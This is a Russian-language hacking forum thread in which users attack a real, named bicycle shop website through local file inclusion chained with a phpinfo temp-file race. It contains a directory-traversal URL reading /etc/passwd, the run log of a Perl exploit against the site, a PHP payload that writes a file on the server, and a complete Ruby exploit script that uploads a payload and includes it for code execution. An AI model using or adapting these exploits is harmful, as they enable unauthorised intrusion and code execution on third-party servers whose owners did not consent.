ссылка на пхпинфо http://www.cloud9(АНТИГУГОЛ)cycles.com/info.php ссылка с инклудом http://www.cloud9(АНТИГУГОЛ)cycles.com/index.php?content=../../../../../../etc/passwd%00 юзаю слоит LFI через phpinfo взятый отсюда https://rdot.org/forum/showpost.php?p=12621&postcount=2 Code: C:\Windows\system32>perl C:\lfi.pl http://www.cloud9(АНТИГУГОЛ)cycles.com/info.php http://w ww.cloud9(АНТИГУГОЛ)cycles.com/index.php?content=../../../../../../etc/passwd%00 Generating huge headers [headers ready] Setting buffer size [512] Sending request [request sent] HTTP/1.1 200 OK Reading......................................................................... ................................................................................ ................................................................................ ................................................................................ ................................................................................ ................................................................................ ................................................................................ ................................................................................ ...................................... Got filename: /tmp/phpROHVzd Including... <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"> <html> <head> <title>Cloud 9 Cycles</title> <meta http-equiv="content-type" content="text/html; charset=utf- 8"> <meta http-equiv="Content-Script-Type" content="text/javascript" /> <meta name="description" content="" /> <script type="text/javascript"> <!-- if (top.location!= self.location) { top.location = self.location.href } //--> </script> <script type="text/javascript" src="fx/js/jquery-1.3.2.js"></scr ipt> <script type="text/javascript" src="fx/js/jquery.easing.1.3.js"> </script> <script type="text/javascript" src="fx/js/jquery.fancybox-1.3.1. pack.js"></script> <script type="text/javascript" src="fx/js/pngfix.js"></script> <script type="text/javascript" src="fx/js/skrypty.js"></script> <link href="fx/css/jquery.fancybox-1.3.1.css" type="text/css" re l="stylesheet" media="screen" /> <link href="fx/css/main.css" type="text/css" rel="stylesheet" /> </head> <body class="avant" style="background: url(fx/gfx/bg/../../../../../../t mp/phpROHVzd .jpg) center no-repeat #000 fixed "> <div id="kontener"> <div id="top"> <div style="position: relative; top: 8px; left: 15px"> <a href="http://www.facebook.com/pages/Cloud-9-Cycles/158029180960878">< img style="margin: 0px 10px 0 0px;" src="fx/gfx/fb.gif"></a> <a href="http://twitter.com/#!/Cloud9cycles"><img style="margin: 0px 520 px 0 0px;" src="fx/gfx/tw.gif"></a> <a href="https://twitter.com/Cloud9Cycles" class ="twitter-follow-button" data-width="230px" data-button="grey" data-text-color= "#FFFFFF" data-link-color="#00AEFF">Follow @Cloud9Cycles</a> <script src="//platform.twitter.com/widgets.js" type="text/javascript">< /script> <iframe src="//www.facebook.com/plugins/like.php?href=http://www.faceboo k.com/pages/Cloud-9-Cycles/158029180960878&send=false&layout=button_coun t&width=450&show_faces=false&action=like&colorscheme=light&f ont&height=21" scrolling="no" frameborder="0" style="border:none; overflow:h idden; width:85px; height:21px;" allowTransparency="true"></iframe> <div class="clear"></div> </div> <a href="index.php?content=home" title="Back to home page"><img src="fx/ gfx/logo.png" alt="Cloud9Cycles logo"></a> <div id="baner-menu-box"> <div id="baner-top" ></div> <div id="menu"> <span> <a href="index.php" title="Back to home page" onmouseover=" this.style.color='#fff'" onmouseout="this.style.color='#000'">home</a> - - <a href="index.php?conte nt=custom" title="Custom builds" onmouseover="this.style.col or='#fff'" onmouseout="this.style.color='#000'">custom builds</a> -- <a href="index.php?conte nt=bikes" title="Browse our Bikes" onmouseover="this.style.col or='#fff'" onmouseout="this.style.color='#000'">bikes</a> -- <a href="index.php?conte nt=service" title="Servicing" onmouseover="this.style.c olor='#fff'" onmouseout="this.style.color='#000'">servicing</a> -- <a href="index.php?conte nt=rent" title="Rent a bike" onmouseover="this.sty le.color='#fff'" onmouseout="this.style.color='#000'">bike rental</a> -- <a href="http://www.clou d9cycles.blogspot.com" title="Cloud 9 Cycles blog" onmouseover="th is.style.color='#fff'" onmouseout="this.style.color='#000'">blog</a> -- <a href="index.php?conte nt=contact" title="Contact us" onmouseover="this.style.c olor='#fff'" onmouseout="this.style.color='#000'">contact us</a> </span> </div> <div id="baner-bottom" ></div> </div> </div> <div class="clear"></div> <div id="content"> hello<br> Keeping file /tmp/phpROHVzd in tmp, use it as long as you need it ............................................................................... патаюсь проинклудить /tmp/phpROHVzd http://www.cloud9(АНТИГУГОЛ)cycles.com/index.php?content=../../../../../../tmp/phpROHVzd%00 и ничего не ывходит =( В чем может быть проблема??
Все работает, правда файл в /tmp/ живет не долго. У меня самописный сплоит под phpinfo, в качестве нагрузки добавил в него: <?php file_put_contents('/tmp/qwerty.lol','<?php phpinfo(); ?>'); ?> Результат: http://www.cloud(дщд)9cycles.com/index.php?content=../../../../../../tmp/qwerty.lol%00
Манипуляции по созданию файлов в /tmp выполняет phpinfo(), достаточно передать скрипту содержимое файлов, как то так.
Как то так, не знаю как объяснить. Code: require 'socket' require 'uri' require 'net/http' def main() #setting up puts "SETTING UP" target = 'http://www/phpinfo.php' # phpinfo() lfi = 'http://www/include.php?file=' # LFI template like http://www.host.com/data/lfi.php?location={LFI} payloadLocation = 'payload.txt' # payload junkFilesCount = 50 # tail recvBufferSize = 1024 # receive buffer size # just echo for u printDotted(' -target:') print("[#{target}]\n"); printDotted(' -lfi:') print("[#{lfi}]\n"); printDotted(' -payload:') print("[#{payloadLocation}]\n"); printDotted(' -junk files count:') print("[#{junkFilesCount}]\n"); printDotted(' -receive buffer size:') print("[#{recvBufferSize}]\n"); # try to load payload begin printDotted('LOAD PAYLOAD') payload = IO.read(payloadLocation) print("[OK]\n") rescue print("[ERROR]\n") return end # payload file = "-----------------------------89q8834898293409rw29\r\n" file += "Content-Disposition: form-data; name=\"file_loader\"; filename=\"\r\npayload.txt\"\r\n" file += "Content-Type: text/plain\r\n\r\n" file += "#{payload}\r\n" file += "-----------------------------89q8834898293409rw29\r\n" # generate junk files printDotted('PREPARE JUNK') curJunkFiles = 0; for junkFiles in 0..junkFilesCount file += "-----------------------------89q8834898293409rw29\r\n" file += "Content-Disposition: form-data; name=\"file" + rand(10000).to_s + "\"; filename=\"\r\njunk" + rand(1000000).to_s * 10000 + ".txt\"\r\n" file += "Content-Type: text/plain\r\n\r\n" file += "superslow\r\n" file += "-----------------------------89q8834898293409rw29\r\n" end print("[OK]\n") printDotted('prepare headers') targetURI = URI(target) query = targetURI.path # add query if not empty if !targetURI.query.nil? query += '?' + targetURI.query end # headers req = "POST #{query} HTTP/1.0\r\n" req += "Content-Type: multipart/form-data; boundary=---------------------------89q8834898293409rw29\r\n" req += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" req += "User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\r\n" req += "Host: #{targetURI.host}\r\n" req += "Content-Length: #{file.length}\r\n" req += "Connection: Close\r\n\r\n" req += file print("[OK]\n") # create tcp socket sock = Socket.new(:INET, :STREAM) # and set receive buffer size sock.setsockopt(Socket::SOL_SOCKET, Socket::SO_RCVBUF, recvBufferSize) printDotted('connecting to') begin sock.connect(Socket.pack_sockaddr_in(80, targetURI.host)) rescue print("[ERROR]\n") return false end print("[OK]\n") sock.write(req) data = '' payloadFound = false loaderFound = false payloadFileName = '' loaderFileName = '' while true printDotted("get next #{recvBufferSize} bytes") tmpData = sock.recv(recvBufferSize) print("[OK]\n") if tmpData.nil? break end data += tmpData tmpFileName = data.scan(/\[name\]\s=>\spayload.txt\n\s\s\s\s\[type\]\s=>\stext\/plain\n\s\s\s\s\[tmp_name\]\s=>\s(.*?)\n\s\s\s\s\[error\]/) if tmpFileName.length > 0 payloadFound = true payloadFileName = tmpFileName[0][0].clone printDotted('payload file location:') print('[' + payloadFileName + ']' + "\n") lfi += payloadFileName + '%00' lfiURI = URI(lfi) printDotted("Include #{payloadFileName}") response = Net::HTTP.get_response(lfiURI); if !response.is_a?(Net::HTTPOK) then print("[ERROR]\n") return else print("[OK]\n") end return end end end def printDotted(msg) print msg + "." * (50 - msg.length) end main()
Это не phpinfo() выполняет подобные "манипуляции", а интерпретатор, пхпинфо же служит связующим звеном, позволяющим при определенных обстоятельствах увидеть путь к временному файлу.